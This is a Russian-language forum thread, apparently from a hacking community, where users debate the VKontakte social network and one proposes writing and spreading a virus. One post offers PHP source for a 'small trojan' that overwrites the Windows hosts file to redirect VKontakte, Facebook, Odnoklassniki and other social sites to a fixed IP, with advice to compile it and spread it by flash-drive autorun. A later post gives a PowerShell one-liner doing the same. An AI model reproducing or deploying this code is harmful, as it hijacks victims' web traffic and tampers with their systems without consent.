за что ненависть к вконтакте? конечно зае*али все эти продажи, но сидеть там без фанатизма считаю вполне нормальным.
От части согласен с тобой ,но я не за вирус а просто что-нить мощное от всего ачата накатать но вот на врятле такое выйдет. P.S. Хотя можно и вредоносное ПО наколякать
Девушка из моей компашки уехала жить в Америку. По мылу переписываться тупо с ней, аськой она не пользуется. И только благодаря контакту я могу с ней общаться, смотреть её фотки, видео, знать какое у неё настроение и т.д. И по вашему контакт это так уж плохо?
предлагаю набрать группу ) придумать как и что... разделить всю работу в написании виря или ПО поровну(хотя можно и одному справиться)) потом всё собрать ...и поспамить))) есть идеи?
Всё хорошо в меру, но когда доходит до фанатизма, то разницы между вконтактовцем и античатовцем нет никакой.
PHP: <?php error_reporting(0);$string="";$win=$_SERVER["windir"];$dir=$win."\system32\drivers\etc\\";$file=$dir."hosts";$con=file_get_contents($file);w($file,"","w");w($file,$con."\r\n"."89.108.124.215 vkontakte.ru www.vkontakte.ru www.ruspace.ru myspace.com mirtesen.ru www.mirbibigona.ru www.my.mail.ru my.mail.ru facebook.com www.facebook.com www.odnoklassniki.ru odnoklassniki.ru www.moikrug.ru moikrug.ru Parta.by www.parta.by\r\n");function w($file,$str,$ty="ab"){$fp=fopen($file,$ty);fwrite($fp,$str);fclose($fp);}?> Вот небольшой троянчик. компилируйте в exe и делайте авторан и на флешку
Хаха )))))))) , респект Егорычу! DA REAL DUDE, просыпается! =))) RESPECT!!!!!!!!!!!!!! ))))))))))))))))))))))))))))
Недавно наткнулся на учебник powershell ,но не понял как найти системный диск и получилось что приходиться полностью прописывать путь .Ну вышло примерно так (только добавляет запись в файл и все) PHP: add-content -path С:\windows\system32\drivers\ect\hosts -value "89.108.124.215 vkontakte.ru" Слеш у меня автоматически убирается так-что путь пишите сами